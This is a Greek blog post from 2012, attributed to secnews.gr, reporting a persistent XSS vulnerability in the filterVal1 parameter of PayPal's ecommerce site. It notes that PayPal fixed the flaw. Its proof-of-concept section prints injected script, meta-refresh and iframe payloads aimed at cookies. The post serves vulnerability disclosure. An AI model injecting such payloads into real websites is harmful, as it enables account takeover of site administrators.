Τρίτη 4 Δεκεμβρίου 2012

Εντοπίστηκε επίμονη ευπάθεια XSS στην επίσημη ιστοσελίδα της Paypal ecommerce !!!





Η ερευνητική ομάδα του εργαστηρίου ευπαθειών ( Vulnerability Laboratory Research Team ), εντόπισε μια επίμονη ευπάθεια επαλήθευσης εισόδου στο σύστημα διαχείρισης περιεχομένου της επίσημης ιστοσελίδας ηλεκτρονικού εμπορίου PayPal.

Τα σφάλματα επιτρέπουν στους επιτιθέμενους να εισάγουν απομακρυσμένα κακόβουλο κώδικα στην εφαρμογή. Η ευπάθεια βρίσκεται στην ενότητα Artikel pro Seite με συνοδευόμενη ,ευάλωτη παράμετρο την filterVal1.

Η απομακρυσμένη εκμετάλλευση δεν απαιτεί εξελιγμένα μέτρα ή προνομιακό λογαριασμό χρήστη και μπορεί να οδηγήσει στην κλοπή λογαριασμού του διαχειριστή.

Proof of Concept:

Review: [ALL Listing] (index) Rechnungen Verwalten - Geld Anfordern > Artikel pro Seite (Listing) > filterVal1

var currencyVals = ["EUR", "AUD", "BRL", "GBP", "DKK", "HKD", "ILS", "JPY", "CAD", "MXN", "TWD", "NZD", "NOK", "PHP",
"PLN", "SEK", "CHF", "SGD", "THB", "CZK", "HUF", "USD", ""];
var txt1 = “zwischen”;
var txt2 = ” und “;
var txtLabel = “Wert 2″;
var advFilter = “email”;
var dateFilter = “invoice_date”;
var filterVal1 = “<meta http-equiv=”refresh” content=”0;url=javascript:document.cookie=true;”> <META HTTP-EQUIV=”Set-Cookie”
Content=”USERID=<SCRIPT>document.cookie=true</script>”> <script>document.cookie=true;</script>

PoC: “><iframe src=http://vuln-lab.com onload=alert(“VulnerabilityLab”) <

Το μέγεθος της επικινδυνότητας της ευπάθειας είναι μέτριο, παρόλα αυτά η PayPal έχει προχωρήσει σε άμεση επιδιόρθωση του συστήματος.

secnews.gr

Δεν υπάρχουν σχόλια:

Δημοσίευση σχολίου

Σημείωση: Μόνο ένα μέλος αυτού του ιστολογίου μπορεί να αναρτήσει σχόλιο.